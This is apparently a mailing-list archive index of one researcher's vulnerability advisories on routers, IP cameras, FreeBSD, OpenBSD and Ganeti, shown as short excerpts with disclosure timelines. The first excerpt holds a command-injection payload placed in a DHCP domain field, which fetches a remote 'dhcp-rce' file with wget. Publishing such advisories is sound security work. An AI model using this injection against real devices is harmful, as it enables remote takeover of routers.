Pwning the Dlink 850L routers and abusing the MyDlink Cloud protocol

2017-09-08 Thread Pierre Kim
:1/dhcps4/pool/end 192.168.0.199 xmldbc -s /runtime/inf:1/dhcps4/pool/leasetime 604800 xmldbc -s /runtime/inf:1/dhcps4/pool/network 192.168.0.1 xmldbc -s /runtime/inf:1/dhcps4/pool/mask 24 xmldbc -s /runtime/inf:1/dhcps4/pool/domain ;wget -O /var/re http://10.254.239.1/dhcp-rce ;

Multiple vulnerabilities found in Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in GoAhead

2017-03-08 Thread Pierre Kim
Hello, Please find a text-only version below sent to security mailing lists. The complete version on analysing the security of "Wireless IP Camera (P2P) WIFICAM cameras and vulnerabilities in GoAhead" is posted here: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html ===

TP-Link C2 and C20i vulnerable to command injection (authenticated root RCE), DoS, improper firewall rules

2017-02-13 Thread Pierre Kim
als. ## Report Timeline * Sep 17, 2016: Vulnerabilities found by Pierre Kim. * Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link replies there is no process to handle security problems in TP-Link routers and refuses to indicate a security point of contact. * Dec 27, 2016: TP-Link

Multiple vulnerabilities found in the Dlink DWR-932B (backdoor, backdoor accounts, weak WPS, RCE ...)

2016-09-28 Thread Pierre Kim
estions should contact their local/regional D-Link support offices for the latest information. ## Report Timeline * Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers. * Apr 04, 2016: A public advisory about Quanta routers is sent to security mailing lists. * Jun 09, 2016: Pierre

FreeBSD bsnmpd information disclosure

2016-01-14 Thread Pierre Kim
e permissions for existing installations. This vulnerability can be fixed by modifying the permission on /etc/bsnmpd.conf to owner root:wheel and permission 0600. ## Report Timeline * Nov 04, 2015: Vulnerability found by Pierre Kim. * Nov 05, 2015: security-offi...@freebsd.org is notified of the vulne

CVE-2015-7944, CVE-2015-7945 - Ganeti Security Advisory (DoS, Unauthenticated Info Leak)

2016-01-04 Thread Pierre Kim
RAPI daemon without authentication. I wrote a tool, "GHETTO-BLASTER", to industrialize the process: user@kali:~$ ./GHETTO-BLASTER http:// Example: https:// 2015 Pierre Kim <pierre.kim@gmail.com> @PierreKimSec https://pierrekim.github.io DO WHAT THE FUCK YOU W

Huawei Wimax routers vulnerable to multiple threats

2015-11-30 Thread Pierre Kim
rs are in the End Of Service cycle and will not be supported anymore. The vendor encourages its clients to discard existing unsupported models and to use new routers. ## Report Timeline * Jul 01, 2015: Vulnerabilities found by Pierre Kim. * Oct 28, 2015: Huawei PSIRT is notified of the vulnerab

OpenBSD package 'net-snmp' information disclosure

2015-11-13 Thread Pierre Kim
. ## Report Timeline * Nov 04, 2015: Vulnerability found by Pierre Kim. * Nov 06, 2015: Stuart Henderson is notified of the vulnerability. * Nov 06, 2015: Stuart Henderson confirms the vulnerability and fixes the package permissions for the sample configuration file in -current and -stable. * Nov

A comprehensive study of Huawei 3G routers - XSS, CSRF, DoS, unauthenticated firmware update, RCE

2015-10-07 Thread Pierre Kim
U B970, WLA1GAPU B932, WLB1TIPU B933, WLB1TIPU B220, WLA1GCYU B260, WLA1GCYU B270, WLA1GCYU B972, WLA1GCYU B200-20, WLB3TILU B200-30, WLB3TILU B200-40, WLB3TILU B200-50, WLB3TILU ??, WLA1GCPU ## Vendor Response The vulnerable routers are in the End Of Service cycle and will not be

Update: Backdoor and RCE found in 8 TOTOLINK router models

2015-08-13 Thread Pierre Kim
, -- Pierre Kim pierre.kim@gmail.com @PierreKimSec https://pierrekim.github.io/

Backdoor and RCE found in 8 TOTOLINK router models

2015-07-16 Thread Pierre Kim
vulnerable. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These vulnerabilities were found by Alexandre Torres and Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories/2015-totolink-0x02.txt https://pierrekim.github.io/blog/2015-07-16

4 TOTOLINK router models vulnerable to CSRF and XSS attacks

2015-07-15 Thread Pierre Kim
. ## Report Timeline * Apr 20, 2015: Vulnerabilities found by Pierre Kim in ipTIME devices. * Jun 20, 2015: Vulnerabilities confirmed with reliable PoCs. * Jun 25, 2015: Vulnerabilities found in TOTOLINK products by looking for similar ipTIME products. * Jul 16, 2015: A public advisory is sent to security

15 TOTOLINK router models vulnerable to multiple RCEs

2015-07-15 Thread Pierre Kim
to un-ethical code found in TOTOLINK products (= backdoors found in new TOTOLINK devices), TOTOLINK was not contacted in regard of this case, but ipTIME was contacted in April 2015 concerning the first RCE. ## Report Timeline * Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres

Backdoor credentials found in 4 TOTOLINK router models

2015-07-15 Thread Pierre Kim
* Jun 25, 2015: Backdoor found by analysing TOTOLINK firmwares. * Jun 26, 2015: working PoCs. * Jul 16, 2015: A public advisory is sent to security mailing lists. ## Credit These backdoor credentials were found Pierre Kim (@PierreKimSec). ## References https://pierrekim.github.io/advisories

ipTIME n104r3 vulnerable to CSRF and XSS attacks

2015-07-06 Thread Pierre Kim
to be useless. They don't publish security information in the changelog, they don't answer to security researchers and they don't credit them either. EFMNetworks ipTIME was not contacted in regard of this case. ## Report Timeline * Apr 20, 2015: Vulnerabilities found by Pierre Kim. * Jun 20

127 ipTIME router models vulnerable to an unauthenticated RCE by sending a crafted DHCP request

2015-07-06 Thread Pierre Kim
researchers and they don't credit them either. EFMNetworks ipTIME was not contacted in regard of this case. ## Report Timeline * Jun 02, 2014: Vulnerability found by Pierre Kim. * Apr 07, 2015: Vulnerabilities confirmed with reliable PoCs. * Jun 25, 2015: Vulnerability confirmed on all

112 ipTIME Routers/WiFi APs/Modems/Firewalls models vulnerable with RCE with root privileges

2015-04-17 Thread Pierre Kim
Response The vendor has released a new firmware version (9.58) for 112 devices: http://iptime.com/iptime/?uid=16202mod=documentpage_id=16 ## Report Timeline * Jun 01, 2014: Vulnerability found by Pierre Kim and Alexandre Torres. * Mar 24, 2015: Vulnerability confirmed on all the existing

FreeBSD 10.x ZFS encryption.key disclosure (CVE-2015-1415)

2015-04-08 Thread Pierre Kim
, 10.1-STABLE - releng/10.1, 10.1-RELEASE-p8 - releng/10.0, 10.0-RELEASE-p18 ## Report Timeline * Mar 01, 2015: Problem found by Pierre Kim * Apr 01, 2015: Vendor is notified of the vulnerability * Apr 01, 2015: Vendor confirms report and indicates a fix is prepared